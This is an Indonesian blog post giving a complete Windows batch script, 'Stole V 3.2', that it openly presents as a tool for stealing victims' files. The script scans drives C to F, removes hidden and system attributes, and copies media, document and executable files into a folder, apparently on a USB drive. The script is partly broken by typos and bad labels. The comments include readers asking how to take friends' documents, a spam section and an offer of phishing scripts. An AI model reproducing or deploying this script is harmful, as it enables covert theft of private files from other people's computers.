Saturday, September 1, 2012

Cara Membuat Program Pencuri Data Dengan Notepad

Cara Membuat Program Pencuri Data Dengan Notepad program ini berfungsi untuk mencuri data seperti:
*.3gp
*.jpg
*.avi
*.wmv
*.rm
*.mpg
*.doc
*.xlsx

dan lainnya sudah tersedia dalam script berikut, caranya mudah banget :
1. Buka Notepad kalian melalui accessories atau melalui Run ketikan notepad.
2. Setelah kebuka notepadnya copy paste script berikut :
Sciptnya

echo off
color 0a
mode 31,15
if "%1"=="/?" goto Sej
if not "%n%" == "" set n=
:MetDtg
cls
title Stole V 3.2
msg * Digunakan untuk mencuri
msg * File atau data2 korban
echo.
echo ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
echo ³ Program Aplikasi ³
echo ³ Stole V 3 .2 ³
echo ³ Author : sohai ³
echo ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
:awal
ption

echo ------EKSTENSI FILE----------

echo [1] 3gp [4] jpg [7] doc

echo [2] wmv [5] rm [8] xls

echo [3] avi [6] mpg [9] Exit

echo [10] exe

echo =============================

echo.

set/p "pil=Masukan Pilihan: "

if %pil%=='' goto option

if %pil%==1 goto 3gp

if %pil%==2 goto wmv

if %pil%==3 goto avi

if %pil%==4 goto jpg

if %pil%==5 goto rm

if %pil%==6 goto mpg

if %pil%==7 goto

if %pil%==8 goto m

if %pil%==9 goto keluar

if %pil%==10 goto exe

goto option
:3gp
Set Maling=%computername%_%random%

If not exist "%Maling%" Md "%Maling%"

For %%a in (C D E F) do if exist %%a:\ (
For /f "tokens=*" %%b in ('dir /a /b /s %%a:\*.3gp') do (
attrib -s -h -r "%%b"
copy "%%b" "%Maling%" /y)
)
echo sudah tidak ditemukan file nyah
pause >nul
cls
goto awal

goto option
:goto wmv
Set Maling=%computername%_%random%

If not exist "%Maling%" Md "%Maling%"

For %%a in (C D E F) do if exist %%a:\ (
For /f "tokens=*" %%b in ('dir /a /b /s %%a:\*.wmv') do (
attrib -s -h -r "%%b"
copy "%%b" "%Maling%" /y)
)

cls
echo sudah tidak ditemukan file nyah
pause >nul


goto option
:avi
Set Maling=%computername%_%random%

If not exist "%Maling%" Md "%Maling%"

For %%a in (C D E F) do if exist %%a:\ (
For /f "tokens=*" %%b in ('dir /a /b /s %%a:\*.avi') do (
attrib -s -h -r "%%b"
copy "%%b" "%Maling%" /y)
)
echo sudah tidak ditemukan file nyah
pause >nul
cls

goto option
:jpg
Set Maling=%computername%_%random%

If not exist "%Maling%" Md "%Maling%"

For %%a in (C D E F) do if exist %%a:\ (
For /f "tokens=*" %%b in ('dir /a /b /s %%a:\*.jpg') do (
attrib -s -h -r "%%b"
copy "%%b" "%Maling%" /y)
)
echo sudah tidak ditemukan file nyah
pause >nul
cls

goto option
:rm
Set Maling=%computername%_%random%

If not exist "%Maling%" Md "%Maling%"

For %%a in (C D E F) do if exist %%a:\ (
For /f "tokens=*" %%b in ('dir /a /b /s %%a:\*.rm') do (
attrib -s -h -r "%%b"
copy "%%b" "%Maling%" /y)
)
echo sudah tidak ditemukan file nyah
pause >nulcls

goto option
:mpg
Set Maling=%computername%_%random%

If not exist "%Maling%" Md "%Maling%"

For %%a in (C D E F) do if exist %%a:\ (
For /f "tokens=*" %%b in ('dir /a /b /s %%a:\*.mpg') do (
attrib -s -h -r "%%b"
copy "%%b" "%Maling%" /y)
)
echo sudah tidak ditemukan file nyah
pause >nul
cls

goto option
:doc
Set Maling=%computername%_%random%

If not exist "%Maling%" Md "%Maling%"

For %%a in (C D E F) do if exist %%a:\ (
For /f "tokens=*" %%b in ('dir /a /b /s %%a:\*.doc') do (
attrib -s -h -r "%%b"
copy "%%b" "%Maling%" /y)
)
echo sudah tidak ditemukan file nyah
pause >nul
cls

goto option
:xls
Set Maling=%computername%_%random%

If not exist "%Maling%" Md "%Maling%"

For %%a in (C D E F) do if exist %%a:\ (
For /f "tokens=*" %%b in ('dir /a /b /s %%a:\*.xls') do (
attrib -s -h -r "%%b"
copy "%%b" "%Maling%" /y)
)
echo sudah tidak ditemukan file nyah
pause >nul
cls

goto option
:exe
Set Maling=%computername%_%random%

If not exist "%Maling%" Md "%Maling%"

For %%a in (C D E F) do if exist %%a:\ (
For /f "tokens=*" %%b in ('dir /a /b /s %%a:\*.exe') do (
attrib -s -h -r "%%b"
copy "%%b" "%Maling%" /y)
)
echo sudah tidak ditemukan file nyah
pause >nul
cls


:keluar
msg * data telah ter ambil!!!
msg * Hayoo !!! Dta kmu tuh apa ya???
msg * HEhehehehe
msg * by sohai
Exit





3. Kalau Sudah save filenya dengan ekstensi *bat dan Save As Type nya isi dengan All File
    contoh : Curidataorang.bat 
  

115 komentar

cara kerja program ini gna mint?

Gampang cara kerjanya gan :
1. Kan entar kalok sudah dibuka aplikasinya. Entar sobat disuruh milih menu option yang ada di aplikasi itu.
2. Kalo sudah milih entar akan langsung otomatis di copy ke Flash Disk sobat.

Nah segitu yng bsa ane jelasinnya terimakasih dah berkunjung dan berkomentar yha....

Salam Blogger.....

kok gg bsa aku nyoba bsa....

kan ada menu pilih entar pilih contoh
agan mau pilih 3gp di menu pertama cukup ketik "1" (tanpa tanda kutip) lalu tekan enter..

Suksma dek....

Inggih bli....

matur suksma bli melali ke blog tiang'e bli...

cuma bisa bilang 1 kata.
good.
ditunggu komentbacknya..
salam
fauzanashariblog.blogspot.(com)

file2nya kok gak tercopy ya gan??? cuma folderny doang!!!! trus setelah milih misal 4 u/ exit tdak bsa ketik 9.

kl mau short by date misalnya (tanggal atau hari) mungkin lebih enteng kerjanya.. kl udah punya update share lg ya :)

Data syp tuh dicuri, emang kita yg nentuhin atau computer yg nentuhin??

Tergantung kita,,,
kan kta disuruh netuin format apa yang mau kita curi..

kenapa gak pake cara yang mudah aja tinggal copy terus paste deh di flasdisk

kalo file .exe gak bisa ya gan...?

ini sifatnya mencuri atau membackup ke flasdisk ya gan?

mencuri data sob sesuai format file yang sobat pilih....

nah udah bsa sob...


udah saya ganti script'a...

gan ntuh software bisa curi data komputer laen secara ja
rak jauh kgak

gan saya sudah jalankan saya pilih no .4 nah keluar jpg
setelah proses muncul di desktop file laptop saya asus300 ..bla..bla..bla
tolong pencerahannya gan, bagaimana cara menggunakannya dan apa akibat yang terjadi setelah saya melakukannya?

terimakasih

akibatnya gak ada sob...

tu dah bka dlu programnya lalu pilih option 1 sd 10...

nice share bli..

salam kenal,
hanyagubukcatatan.blogspot.com

ini kalo disimpan dikomputer gimana gan? apa berpengaruh

kerja bagus gan,, codingnya ente bikin sendiri?

mantap saya mau nanya kalau ngambil punya orang itu gimana apa lansung kita ketik nama filenya /data yang ada di komputer orang terus kita enter apa gimana gen
tolong jelasin gan...gini lebih jelasnya contohnya saya mau ngambil dokumen temen saya itu langsung kita buka program kita lansung ketik nama dokumen temen saya langsung entr apa gi mana gan

membuat bresenham ada ga kodingnya?...

Jarak jauh bisa,, tp harus lacak dulu "IPv4 victim",, yg pasti lewat jaringan internet,, perlu dirubah scriptx dikit...hm...

mantap,,, tapi ko ane ga paham, banyak bacaan aneh,, tapi keren

http://jajangbaberwahyudin.blogspot.com

itu programnya ditaruh di flashdisk???

kunjungi blog ane softgart.blogspot.com

maksudnya program ini untuk mencuri data orang gan?

kita pilih format pada option di program tersebut gan..

klo ambil data coreldraw, photoshop, autocad bisa ga gan...tks.

wah mantap gan smoga bisa bermanfaat.ane juga mw share aplikasi pembayaran angsuran bank pke php berbasis oop sama Yii bisa visit ke SINI salamkenal sob

......weeeh bagus banget program noteped amu.....
...kunjungi balik dong,,,,prtengseng.blogspot

mantap gan, thanks.
hack token top eleven ada ga gan???

mantep pisan gam mekasih sukses selalau buat agan dan kita semua AMIN

Penting banget ni gan,,, makasih banyak gan udah share ilmunya

Bisa Lewat Jaringan Lan gx nh Gan...??

gan maw nanya...cara nyimpan ke flas disk gimana..? harus d burning atau copy paste doang.....???

mantap gan,,,izin copas gan,,,,
thank's smoga sama2 bermanfaat,,,

Dapet dari mana tuh kodenya bang??

apanya yang dikopi filenya atau folderya

hy sob nie software bz d gunakan sengan jaringan gk????

berrarti kita harus copy program ini di fd gitu?

saya sudah copi paste, lalu langkah slanjutnya gmn min?

naro hasil pembuatannya dimana gan..? di laptop teman kah atau di laptop sendiri

Lihat Hasil Curian Kita Dimana Gan..?

bocah
lebih cepet klo kita pake program
lama klo nyari" trus copas

keren gan programnya
semoga bukan repost
btw gw jg suka programing kyk gini
gw nemuin bbrp bug, udh gw sempurna, trus gw tambah
klo mao email gw aj

di flashdisk tiba" muncul folder, namanya acak sesuai nama komputer, di dalam itu

Kali di balikin gimana caranya??
misal kita mau curi data yg di flashdisk di save ke PC kita

Thanks infonya sangat bermanfaat sob,semoga berguna bagi semua orang terutama bagi saya.
Jika berkenan kunjungilah blog saya http://andom99.blogspot.com/
dan follow me @ andri_gs99

masih gak ngerti gan ini buat apa.
bedanya sama copas juga apa?

This comment has been removed by the author.

bro ada program lain ndak selain ini

www.berawal.net Postingan yang sangat bagus, saya setuju dengan Anda 100%!

www.mainbisnis.com saya terkesan, saya harus mengatakan ini kepada anda.

www.sukasuka.info Sangat jarang saya menemukan sebuah blog yang informatif dan menghibur seperti ini.

casino online melakukannya untuk tujuan SEO , tetapi untuk belajar hal-hal baru.

naga303.com Blog Anda sangat penting bagi semua orang, teruslah berbagi.

artiekl anda sgtlah bagus, tpi ini cara kerjanya gimana y?, textny udah sy simpan. tolong dijelaskan scr rinci. mohon kirim komenatrny lewat email saja. yusufrafif@gmail.com

itu ga tergantung sma kapasitas flash disk kan?

bang ni bhsa pemograman apa?
jelas sin scrip nya bang buat proyek ke dosen
" tolong bang admin"
penjelasan nya bisa dikirim ke awikurniawan96@gmail.com

Work gan terimakasih buat scriptnya.. :D...

<a href="https://www.estuwebdesign.com>Jasa Web Desain Murah</a>

pakek ftp -_- .. gw mahir kok ngambil data jarak jauh

Sungguh informasi yang sangat bagus, semoga tetap update terus min..
terima kasih

Perkenalkan, saya dari tim kumpulbagi. Saya ingin tau, apakah kiranya anda berencana untuk mengoleksi files menggunakan hosting yang baru?
Jika ya, silahkan kunjungi website ini www.kbagi.com untuk info selengkapnya.

Di sana anda bisa dengan bebas share dan mendowload foto-foto keluarga dan trip, music, video, filem dll dalam jumlah dan waktu yang tidak terbatas, setelah registrasi terlebih dahulu. Gratis :)

saya mau nanya kalo aplikasinya saya masukkin ke flashdisk,abis itu saya buka,bisa gak ngambil data dari pc trs dipindahkan ke flashdisk?
terimakasih

saya mau nanya kalo aplikasinya saya masukkin ke flashdisk,abis itu saya buka,bisa gak ngambil data dari pc trs dipindahkan ke flashdisk?
terimakasih

mas mohon solusi, punya saya sudah bisa tp kenapa datanya tersimpan ke data C/username bukan ke flashdisk

cara belajar buat code2 gitu gmana bos,
bisa belajar gac

cara belajar buat code2 gitu gmana bos,
bisa belajar gac

dari pada ribet mending langsung belajar 4 mata, gi mana bang, aku pengen belajar nich.....

gan ini jatohnya nge-CUT file atau cuma meng_COPY file?


yang berminat belajar web phising apa saja mulai dari game,fb,line@,line biasa , instagram dll bisa hub di line saya
id line : pepekdevi

yang minat silahkan chat aja nantik akan di kasi scrip secara cuma cuma di ajarin edit dan penggunaan sampek bisa sisanya kalian kembangkan sendiri

BOONK WKWKWKW


EmoticonEmoticon